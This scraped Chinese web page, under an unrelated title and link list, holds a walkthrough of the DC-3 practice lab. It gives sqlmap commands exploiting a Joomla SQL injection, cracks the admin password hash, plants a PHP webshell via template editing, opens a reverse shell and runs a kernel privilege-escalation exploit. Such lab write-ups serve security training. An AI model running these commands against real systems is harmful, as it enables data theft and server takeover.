当前位置: 首页 > news >正文

网站的内部推广的方法wordpress 挂马 清除

网站的内部推广的方法,wordpress 挂马 清除,前端开发就是做网站吗,电子商务公司排行榜啰嗦两句#xff1a; 提权之前完成是一个月前做的#xff0c;当时在提权处出了点问题就搁置了#xff0c;今天才完成#xff0c;所以IP地址可能会会有变化 注意#xff1a;后续出现的IP地址为192.168.200.55同样是靶机IP地址#xff0c;若本文能有帮助到你的地方#xf…啰嗦两句 提权之前完成是一个月前做的当时在提权处出了点问题就搁置了今天才完成所以IP地址可能会会有变化 注意后续出现的IP地址为192.168.200.55同样是靶机IP地址若本文能有帮助到你的地方不胜荣幸。一、搭建环境 1.工具 攻击机kali192.168.200.14 靶机DC-3 (未知) 2.注意 攻击机和靶机的网络连接方式要相同另外DC-1的网络连接方式我这里采用NAT模式是与kali的网络连接模式相同的当然亦可以选用桥接模式 DC-1网络设计 点击高级后可以查看DC-1的靶机MAC地址便于扫描IP时识别 二、信息收集 1.扫描同网段下的存活主机方法 靶机dc-3的MAC地址根据MAC地址判断IP地址 其一 arp-scan -l 其二 nmap -sP 192.168.200.0/24 -T4其三 natdiscover 2.扫描目标IP开放端口 nmap -sV -p- 192.168.200.8 #-sV 扫描目标主机端口上运行的软件信息 #-p- 扫描全部端口0-65535可以看到此站点只开启了80端口 3.扫描后台目录 利用dirsearch工具可与看到administrator这个目录应该是后台 4.指纹收集 登录网站 一个著名的CMS系统 左侧的英文翻译为 这一次只有1个flag一个切入点没有任何线索。 要获得该标志您显然必须获得root权限提权。 你如何成为根取决于你——显然还有系统。 祝你好运我希望你喜欢这个小挑战 。 使用joomscan进行扫描 joomscan -u http://192.168.200.8/joomscan 安装方法 sudo apt-get install joomscan一般的可以根据框架版本去百度搜索它相关的漏洞先登录后台目录 百度搜索后可以发现千篇一律的sql漏洞 利用KILI工具查找漏洞 查看文件、 5.后台爆破 sqlmap列出数据库库名 sqlmap -u “http://192.168.200.8/index.php ?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml” --risk3 --level5 --random-agent --dbs -p list[fullordering] 根据提供的SQLmap构建的payload sqlmap列出数据库joomladb下的所有表名 sqlmap -u “http://192.168.200.8/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml” --risk3 --level5 --random-agent -D “joomladb” --tables -p list[fullordering] 发现#_users表 列出users表的字段类型 sqlmap -u “http://192.168.200.8/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml” --risk3 --level5 --random-agent -D “joomladb” -T “#__users” --columns -p list[fullordering] #__users 里的信息 确定账户名 账号密码一般为“username,password” 爆数据 sqlmap -u “http://192.168.200.8/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml” --dbms mysql -D joomladb -T ‘#__users’ -C id,name,password,username --dump $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu #哈希加密使用kali中的join工具进行解密 vi admin.txt #编辑 将密文写入 john admin.txt #破解破解后得到登录密码为snoopy 账号admin 登录后台 三、漏洞探测 上传Webshell 可以找到网站源码而模板里的php文件可编辑。 Joomla后台可编辑模板利用这个功能在template下面创建一个 test.php写入一句话蚁剑成功连接 当时上传一句话木马的路径如下此时是可以浏览网站目录和打开虚拟终端的。 模板问及那所在路径直接访问当前文件夹均可以获取当前文件夹的内容 http://192.168.200.8/templates/beez3/html/反弹shell 在/templates/beez3模板里上传一个反弹shell的文件记住上传路径文件由自己创建本文的文件名shell.php 反弹shell成功 利用EXP 用searchsploit工具查找Ubuntu 16.04的提权发现一个“拒绝服务漏洞”可以用来提权 searchsploit ubuntu 16.04查看漏洞下载EXP cp /usr/share/exploitdb/exploits/linux/local/39772.txt shell.txt cat shelll.txt文件内容提供了EXP网址 下载这步在靶机中实现这步骤操作失误 解压文件 unzip 39772.zip #解压29772.zip文件 cd 39772 tar -xvf exploit.tar #解压exploit提权脚本tar包 cd ebpf_mapfd_doubleput_exploit提权 编译代码 ./compile.sh #执行脚本编译文件提权获取root权限 ./doubleput #执行提权文件略微等待一会儿 文章参考https://blog.csdn.net/weixin_43583637/article/details/101554815
http://www.hkea.cn/news/14584027/

相关文章:

  • 厦门建设工程招标中心网站遵义一般做一个网站需要多少钱
  • iis如何做网站管理器小程序微商城定制开发
  • 天长网站开发磁力链
  • 天津企业网络建站网站评价系统源码
  • apache建设多个网站北京著名的网站制作公司
  • 天河建设网站价格山东网站定制设计
  • eclipse sdk做网站移动端网站的优点
  • 建站工具模板智能小程序是什么
  • 做门户网站需要具备什么google引擎入口
  • 呼和浩特网站优化wordpress linux位置
  • 厦门网站建设模板网站服务费怎么做凭证
  • 建设一个网站要多少费用网络信息公司
  • 你做网站群好朋友的作文唯品会网站建设的目的
  • 郑州网站建设xinsu360湖州南浔建设局网站
  • 深圳做微商网站制作如何制作营销网站模板下载
  • 佛山外贸网站建设资讯怎么样自己做企业网站
  • 手机网站判断跳转网站备案号示例
  • 建设银行住房贷款网站网站api怎么做的
  • 做软装什么网站可以吗百度全网营销
  • 关于门户网站建设方案微信小程序制作平台哪个好
  • asp有哪些网站仿笑话网站源码
  • php和网站建设制作灯笼活动
  • 网站维护作用360浏览器直接进入网站
  • 万网空间官方网站网站域名在哪里看
  • 关于动物的网站建设策划书可以自己做漫画的网站
  • 南昌网站开发培训班wordpress登录 小工具
  • 上海网站建设网页制wordpress站内搜索框
  • 长沙旅游网站制作wordpress怎么屏蔽注册链接
  • 网站开发面试问题以及回答重庆企业做网站
  • 建站系统破解源码湖北网络广播电视台